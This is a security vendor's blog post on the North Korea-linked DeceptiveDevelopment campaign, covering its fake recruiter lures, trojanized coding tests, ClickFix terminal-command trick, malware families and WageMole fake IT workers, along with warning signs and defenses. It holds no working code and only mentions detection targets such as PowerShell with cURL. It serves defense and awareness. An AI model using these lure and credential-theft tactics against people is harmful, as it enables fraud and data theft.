Stay updated with the latest Cybersecurity News on our TecnetBlog.

DeceptiveDevelopment: The Fake Dev Test That Steals Your Data

Written by Eduardo Morales | Sep 26, 2025 1:15:00 PM

If you're hiring for tech roles or applying as a dev, designer, or data engineer, this warning is for you. A threat actor aligned with North Korea, known as DeceptiveDevelopment, specializes in social engineering. They pose as recruiters, send you a “technical challenge,” and trick you into downloading trojanized code. Their goal? Steal credentials, drain wallets, take control of your machine—and feed covert IT worker operations that use fake identities to secure remote jobs.

At TecnetOne, we’ll break down how the attack works, which tools are involved, and what you can do to avoid becoming the next victim.

 

The Main Trick: Dream Jobs, Private GitHub Tests, and ClickFix

 

This group operates across LinkedIn, Upwork, Freelancer, and Web3 job boards. They create fake recruiter profiles offering well-paid remote roles. The “technical screening” is a private GitHub/GitLab/Bitbucket repo with what looks like a harmless project—but it’s trojanized.

The initial payload is usually BeaverTail (or its successor, OtterCookie), followed by a second-stage modular RAT called InvisibleFerret, used to exfiltrate browser data, crypto wallets, and establish remote control (including AnyDesk).

They also deploy ClickFix: during a fake video interview, a "camera issue" appears, and you’re guided to fix it by pasting a command into your terminal. That command silently downloads and runs malware—on Windows, macOS, and now Linux, according to recent findings.

 

A Cross-Platform Arsenal: Python, JavaScript, Go, and .NET

 

DeceptiveDevelopment is not a single malware file. It’s a full infection chain, using multiple stages and languages:

 

  1. BeaverTail / OtterCookie (JS / C++ Qt): First-stage info-stealer, grabs credentials, keychains, and crypto extensions. Also a downloader.

 

  1. InvisibleFerret (Python): Modular RAT, includes keylogger, clipboard monitor, and AnyDesk deployment.

 

  1. WeaselStore (Go and Python variants): Extracts browser/wallet data, acts as persistent RAT post-exfiltration. Comes with full toolchains for compiling on Windows, Linux, and macOS.

 

  1. TsunamiKit (.NET): Complex infection with spyware, crypto miners (XMRig/NBMiner), persistence, and Defender exclusions.

 

  1. Advanced Native Backdoors (Tropidoor, AkdoorTea): More refined implants, linked to other North Korean threat groups—suggesting shared tooling and evolution.

 

The pattern: less zero-day magic, more social engineering, tool reuse, and adaptation of shady open-source projects. The result? Cheap, scalable, and effective campaigns.

 

Similar titles: SystemBC: Malware That Turns Vulnerable VPS Into Cybercrime Highways

 

Where Do North Korean “IT Workers” Fit In?

 

This leads to the second piece of the puzzle: WageMole—covert IT workers who apply for remote jobs using synthetic CVs, AI-generated headshots, and even face-swapped interviews.

Operating outside North Korea (in China, Russia, Southeast Asia), they work in teams with "handlers" assigning quotas, customer scripts, and full-time efforts to secure contracts, deliver work, and train in web dev, blockchain, English, and AI.

The Connection:

 

  1. DeceptiveDevelopment steals identities and credentials (emails, documents, profiles).

 

  1. WageMole uses them to pass job screenings.

 

  1. Once hired, they can exfiltrate data, divert payments, subcontract human "proxies," or act as insider threats.

 

The impact on your company? Data breaches, payroll fraud, stolen IP, and compliance risks (including potential sanctions).

 

Figure 1. Execution chain of WeaselStore (Source: welivesecurity)

 

How They Target You (as a Candidate or a Hiring Company)

 

If You’re Job Hunting:

 

  1. A “recruiter” reaches out with a dream offer.

 

  1. They send a private repo or fake interview link.

 

  1. You copy a command “to enable your camera” (ClickFix) or compile a “simple” project.

 

  1. A downloader runs (BeaverTail/OtterCookie) RAT deployed (InvisibleFerret/WeaselStore) → data exfiltration (cookies, sessions, wallets).

 

If You’re a Hiring Company:

 

  1. You receive spotless CVs and portfolios—convincing but fake.

 

  1. Candidates use AI to alter video/audio, or proxies conduct interviews.

 

  1. Once hired, they access repos, CRM, or cloud tools.

 

  1. They may extract data or inject malware through dependencies, RMM, or build pipelines.

 

Figure 2. Some Windows commands implemented internally in the Tropidoor code (Source: welivesecurity)

 

Warning Signs to Watch For

 

For Devs and IT Teams:

 

  1. Private repos with hidden bloated comments or obfuscated scripts

 

  1. “Support” instructions asking for terminal commands

 

  1. Interview links on non-corporate domains (recently registered, no privacy policy)

 

  1. “Video helper” binaries requesting elevated permissions

 

For HR and Security:

 

  1. Generic, too-perfect CVs with timeline/geolocation oddities

 

  1. Video calls with strange latency or glitchy facial artifacts

 

  1. Candidates who avoid live coding or insist on using their own devices/connections

 

  1. Access logs with geolocation mismatches or suspicious IP switching

 


Figure 3. Version parsing in Akdoor from 2018 and AkdoorTea from 2025 (Source: welivesecurity)

 

What You Can Do Today (and How TecnetOne Helps)

 

For Individuals (Candidates and Freelancers):

 

  1. Never paste unknown terminal commands. If a camera fails, restart your browser—don’t run scripts.

 

  1. Use isolated environments (VMs or burner devices) for technical tests.

 

  1. If you’ve opened a shady repo, log out of sessions, rotate credentials, and revoke tokens.

 

  1. Enable passkeys/MFA for email, cloud, dev tools, and wallets.

 

  1. Monitor wallets and change seed phrases if exposed.

 

For Companies (IT, HR, Legal):

 

  1. Use secure hiring processes: tech tests in sandboxed or VDI environments, no external repos from candidates.

 

  1. Apply strong identity verification: liveness checks, biometric comparisons, IP/document validation.

 

  1. Enforce zero-trust onboarding: least privilege, just-in-time access, and activity logging.

 

  1. Implement browser protection, extension control, and EDR/XDR with detections for ClickFix, PowerShell+cURL, obfuscation, and unauthorized AnyDesk use.

 

  1. Have DFIR playbooks for info-stealers and session hijacks: auto-rotate cookies/tokens and kill SaaS refresh tokens.

 

  1. Train HR in AI-based fraud detection: deepfakes, proxy behavior, and cloned portfolios.

 

What TecnetOne Can Do for You

 

  1. Proactive Threat Hunting: detection of BeaverTail, OtterCookie, InvisibleFerret, WeaselStore, TsunamiKit, and ClickFix patterns.

 

  1. Endpoint and browser hardening, script-based loader blocking, and known RAT prevention.

 

  1. Hiring process audits: sandboxed test design, doc verification, secure VDI interviews, recruiter training.

 

  1. Identity and Access Management (IAM) with MFA, RBAC, JIT access, and continuous permission review.

 

  1. 24/7 Incident Response, including token revocation, secret rotation, session cleanup, and laptop sanitization.

 

  1. Awareness training for your IT, HR, and hiring managers, including interview simulations and detection labs.

 

Also of interest: The Evolution of Artificial Intelligence Driven Malware

 

Conclusion

 

DeceptiveDevelopment isn’t just another trojan—it’s a full-blown deception factory blending job phishing, ClickFix, modular malware, and fake IT workers using AI.

If you post job listings or work in tech, you’re on their radar.

The good news? With hardened hiring processes, granular access control, browser/endpoint detection, and rapid incident response, you can shut them down before damage is done.

At TecnetOne, we’re already helping businesses like yours detect, block, and dismantle these campaigns.

 
View full post